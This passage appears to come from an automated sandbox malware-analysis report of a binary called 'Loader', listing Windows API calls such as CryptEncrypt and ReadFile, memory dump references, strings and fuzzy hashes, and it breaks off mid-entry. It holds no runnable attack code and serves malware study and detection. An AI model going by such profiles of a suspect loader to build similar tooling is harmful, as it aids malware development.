                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                  • String ID:
                                                                                                  • API String ID: 1383202999-0
                                                                                                  • Opcode ID: 01f7201e74d0b82d62706585314578caacc38f9d9b531afbec423903d37ace7d
                                                                                                  • Instruction ID: 84f2fb83fda30446fb1fa28018b43a6c3715661be23b74976670711cb7046a84
                                                                                                  • Opcode Fuzzy Hash: 01f7201e74d0b82d62706585314578caacc38f9d9b531afbec423903d37ace7d
                                                                                                  • Instruction Fuzzy Hash: 7811ED728002358FCB05EBA4E9A5BAD77B6BF90320F250418F8156B289DF749E00CB91
                                                                                                  APIs
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0094A3DF,00000000,00000001,00000000,?,?,00944480,?,00000000,00000000), ref: 0094AEA7
                                                                                                  • GetLastError.KERNEL32(?,0094A3DF,00000000,00000001,00000000,?,?,00944480,?,00000000,00000000,?,?,?,00943DC6,00000000), ref: 0094AEB3
                                                                                                    • Part of subcall function 0094AF10: CloseHandle.KERNEL32(FFFFFFFE,0094AEC3,?,0094A3DF,00000000,00000001,00000000,?,?,00944480,?,00000000,00000000,?,?), ref: 0094AF20
                                                                                                  • ___initconout.LIBCMT ref: 0094AEC3
                                                                                                    • Part of subcall function 0094AEE5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0094AE81,0094A3CC,?,?,00944480,?,00000000,00000000,?), ref: 0094AEF8
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0094A3DF,00000000,00000001,00000000,?,?,00944480,?,00000000,00000000,?), ref: 0094AED8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744216297-0
                                                                                                  • Opcode ID: ed8ca2dc6f5392c3f25ffe23e80e3b94c2ce5163f016589875877322f9e82445
                                                                                                  • Instruction ID: 41d09c2cf95021f2bc57d796832f3168af6f230d67d79393fa5daf8ca8e324af
                                                                                                  • Opcode Fuzzy Hash: ed8ca2dc6f5392c3f25ffe23e80e3b94c2ce5163f016589875877322f9e82445
                                                                                                  • Instruction Fuzzy Hash: 85F09E36554258BBDF525F96DC04E9A3E26EB487A1F444410FA1896170DA328860AB91
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 009305F7
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00930606
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0093060F
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0093061C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: f01fbf2fabefbadf7a575f6d79e40c42a174d9211ef25de9454a446d1bafd095
                                                                                                  • Instruction ID: 578595d6422933853c2e9bc90b2a748a4a68ab1753254dd67553cc8a4863716e
                                                                                                  • Opcode Fuzzy Hash: f01fbf2fabefbadf7a575f6d79e40c42a174d9211ef25de9454a446d1bafd095
                                                                                                  • Instruction Fuzzy Hash: 99F06274D1420DEBCB00DBB5DA4999EBBF4FF1C205B918996A452E7150EB30AB44DF50
                                                                                                  APIs
                                                                                                    • Part of subcall function 0093C25A: GetLastError.KERNEL32(?,?,00935585,00958E90,0000000C), ref: 0093C25E
                                                                                                    • Part of subcall function 0093C25A: SetLastError.KERNEL32(00000000), ref: 0093C300
                                                                                                  • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00935CC5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00940B25
                                                                                                  • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00935CC5,?,?,?,00000055,?,-00000050,?,?), ref: 00940B5C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CodePageValid
                                                                                                  • String ID: utf8
                                                                                                  • API String ID: 943130320-905460609
                                                                                                  • Opcode ID: 93e27b90bda8d7661139dc1cc246f028f3c4c15878e1a509f872b37dac0b7096
                                                                                                  • Instruction ID: e61426edbcb9d857171865d118092989e59b15decf37fa564893cbf7e83e02cb
                                                                                                  • Opcode Fuzzy Hash: 93e27b90bda8d7661139dc1cc246f028f3c4c15878e1a509f872b37dac0b7096
                                                                                                  • Instruction Fuzzy Hash: C3510771A00705EADB28AB718C86FA773ACEFC4705F150629FB999B081E670D980C768
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Release_chore.LIBCPMT ref: 009276C6
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00927701
                                                                                                    • Part of subcall function 0092B0D7: CreateThreadpoolWork.KERNEL32(0092B200,00928BCA,00000000), ref: 0092B0E6
                                                                                                    • Part of subcall function 0092B0D7: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0092B0F3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                  • String ID: Fail to schedule the chore!
                                                                                                  • API String ID: 3683891980-3313369819
                                                                                                  • Opcode ID: 76e7a368d302517c9c3a7f62d7d552825be423b1f681cc35b51ed6d10abf5763
                                                                                                  • Instruction ID: 2c8c67c923f8abea63e0c5acba1199876ab9ae048cb9026db5880797b8346bfe
                                                                                                  • Opcode Fuzzy Hash: 76e7a368d302517c9c3a7f62d7d552825be423b1f681cc35b51ed6d10abf5763
                                                                                                  • Instruction Fuzzy Hash: DF51CCB1D013289FCB00DF94E895BAEBBB4FF88314F144129E8196B391D776AA05CF91
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0093B983,?,?,00000000,00000000,00000000,?), ref: 0093BAA7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                  • Opcode ID: 279d278e918659287faa7be8fc8cb982d9a9acb573e445080d5cdf523437209c
                                                                                                  • Instruction ID: 8754b042d05c3489bf7e02cc43a8e8b2cfffb5147f530bd7ec9fee8c65888da6
                                                                                                  • Opcode Fuzzy Hash: 279d278e918659287faa7be8fc8cb982d9a9acb573e445080d5cdf523437209c
                                                                                                  • Instruction Fuzzy Hash: 87415871900209AFCF15DF98CC81AEEBBB9FF88304F188199FA18A7265D7359950DF51
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00924066
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 009241A2
                                                                                                    • Part of subcall function 0092AD65: _Yarn.LIBCPMT ref: 0092AD85
                                                                                                    • Part of subcall function 0092AD65: _Yarn.LIBCPMT ref: 0092ADA9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 2070049627-1405518554
                                                                                                  • Opcode ID: 4c2c0bf39d6a9f404d04a6dc243df9b1c594d00d2f917bf602841915aa30b4dc
                                                                                                  • Instruction ID: c8289a0468b655769ae5f4dea8beac2e48f9bcdf66091187f5061c700b15c386
                                                                                                  • Opcode Fuzzy Hash: 4c2c0bf39d6a9f404d04a6dc243df9b1c594d00d2f917bf602841915aa30b4dc
                                                                                                  • Instruction Fuzzy Hash: 07417FF1A007559BDB10DF69E905717BBE8BF54704F044628E4099B781E3BAE518CFE2
                                                                                                  APIs
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0093B565
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___except_validate_context_record
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                  • Opcode ID: d8e9cfcfa9f8b81e65bbde9bca117d68974dd0a6cfe294b6c0827846da036a74
                                                                                                  • Instruction ID: 2f05aa9b262c13c6cd326c1573758a2f8ce1a08a24b5f72f5dd8eeea09436975
                                                                                                  • Opcode Fuzzy Hash: d8e9cfcfa9f8b81e65bbde9bca117d68974dd0a6cfe294b6c0827846da036a74
                                                                                                  • Instruction Fuzzy Hash: CF31E472400219DFCF269F50CC459AE7B6AFF09329F18465BFA5449122C332CCA2DF82
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0092B9A9
                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?), ref: 0092B9CE
                                                                                                    • Part of subcall function 009306FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,0092F444,02D69110,?,?,?,0092F444,00923EEA,009575AC,00923EEA), ref: 0093075D
                                                                                                    • Part of subcall function 00938443: IsProcessorFeaturePresent.KERNEL32(00000017,0093C314), ref: 0093845F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1924019822-1018135373
                                                                                                  • Opcode ID: 1194773a1362387949986b71898e387d008e5afaca72ea04cbcbf9bdb45c5d54
                                                                                                  • Instruction ID: c1fdad9575050c7c7ab652585485c6486fc872a1e3c91a985e0ceb38f999c8ed
                                                                                                  • Opcode Fuzzy Hash: 1194773a1362387949986b71898e387d008e5afaca72ea04cbcbf9bdb45c5d54
                                                                                                  • Instruction Fuzzy Hash: 1A21BE35D0022C9BCF24DF95E946BAEB7F8EF84718F580419E605AB259CB70AD85CB81
                                                                                                  APIs
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00922853
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___std_exception_copy
                                                                                                  • String ID: bad array new length$ios_base::badbit set
                                                                                                  • API String ID: 2659868963-1158432155
                                                                                                  • Opcode ID: 4abcd885289069f56ed1fe5df1bd3773909ee821eef308dd34e98e8f3d418db5
                                                                                                  • Instruction ID: 894123aaa90aa1be8cdcfc3b9e87d08cc44c5be635e49fef0655ad7d44b9f0b7
                                                                                                  • Opcode Fuzzy Hash: 4abcd885289069f56ed1fe5df1bd3773909ee821eef308dd34e98e8f3d418db5
                                                                                                  • Instruction Fuzzy Hash: 7501D4F26193019BD714DF58D826B1B7BE8EF84318F00892CF4498B340E771E805CB81
                                                                                                  APIs
                                                                                                    • Part of subcall function 009306FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,0092F444,02D69110,?,?,?,0092F444,00923EEA,009575AC,00923EEA), ref: 0093075D
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00922853
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1667481137.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1667462328.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667506102.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667584332.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667603536.000000000095B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667622823.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667841609.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1667878570.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise___std_exception_copy
                                                                                                  • String ID: bad array new length$ios_base::badbit set
                                                                                                  • API String ID: 3109751735-1158432155
                                                                                                  • Opcode ID: c7a12b1e71260d0ee332d3fe1af2c3ead70afa979aabf827d73fee3ca2ce7b4b
                                                                                                  • Instruction ID: 6f8afbe67d0b4a95431eee5b9a03c150ba1d54cf7cefda6945ab1cbad1ac3e03
                                                                                                  • Opcode Fuzzy Hash: c7a12b1e71260d0ee332d3fe1af2c3ead70afa979aabf827d73fee3ca2ce7b4b
                                                                                                  • Instruction Fuzzy Hash: DAF01CF1619300ABD314EF59DC16B0BBBE4EB85319F01881CF5889B301E3B5D449CB92
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009225D0
                                                                                                    • Part of subcall function 0092F20D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,009225EA,?,?,00000000), ref: 0092F219
                                                                                                    • Part of subcall function 0092F20D: GetExitCodeThread.KERNEL32(?,00000000,?,?,009225EA,?,?,00000000), ref: 0092F232
                                                                                                    • Part of subcall function 0092F20D: CloseHandle.KERNEL32(?,?,?,009225EA,?,?,00000000), ref: 0092F244
                                                                                                  • CryptEncrypt.ADVAPI32 ref: 00922617
                                                                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 0092261F
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 0092264B
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 0092265C
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 0092266D
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 0092267E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$CryptThread$CloseCodeCurrentDestroyEncryptExitHandleObjectSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1492798345-0
                                                                                                  • Opcode ID: 0253c1fdbb326cb86f29e280aad148d3d98b1ea1642c3535e650569f263b70e3
                                                                                                  • Instruction ID: d0e35dab9c0cafd7b70f405c4b2cb380e661b97833206a27a1db158528c48516
                                                                                                  • Opcode Fuzzy Hash: 0253c1fdbb326cb86f29e280aad148d3d98b1ea1642c3535e650569f263b70e3
                                                                                                  • Instruction Fuzzy Hash: 303195F2D40325ABEB10EF90EC06BAEBBF4EB45710F040225E515762C5E3B55A54CBE2
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,009414AD,00000002,00000000,?,?,?,009414AD,?,00000000), ref: 00941B90
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,009414AD,00000002,00000000,?,?,?,009414AD,?,00000000), ref: 00941BB9
                                                                                                  • GetACP.KERNEL32(?,?,009414AD,?,00000000), ref: 00941BCE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 2299586839-711371036
                                                                                                  • Opcode ID: c0fed1cb34b61ae36971a14d109869236ff69875c8b5362b3a4dda1861a3a4a8
                                                                                                  • Instruction ID: 331ba323c29fe42a42e9fb0e33e0363336fd3d690a8ca67e99a83ecf9bfde633
                                                                                                  • Opcode Fuzzy Hash: c0fed1cb34b61ae36971a14d109869236ff69875c8b5362b3a4dda1861a3a4a8
                                                                                                  • Instruction Fuzzy Hash: 3721A732B10204ABEB348F15C900E9773AEEF54BA5B968564E94AD7118F732DEC0D750
                                                                                                  APIs
                                                                                                    • Part of subcall function 00921240: _strlen.LIBCMT ref: 009212BA
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 009220F6
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0092211B
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0092212A
                                                                                                  • _strlen.LIBCMT ref: 0092217D
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009222AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1667175336.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1667161368.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667197811.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667213235.000000000095A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667229125.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667240653.0000000000962000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1667276415.00000000009AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_920000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 1490117831-0
                                                                                                  • Opcode ID: b719bc6efa6bb0f8cc7706b08db264266627c267e2c69932d5b9ffed221762eb
                                                                                                  • Instruction ID: 93807cb800decb627051531cee7a860eab1433e6fda234c3f92c8cb605f70267
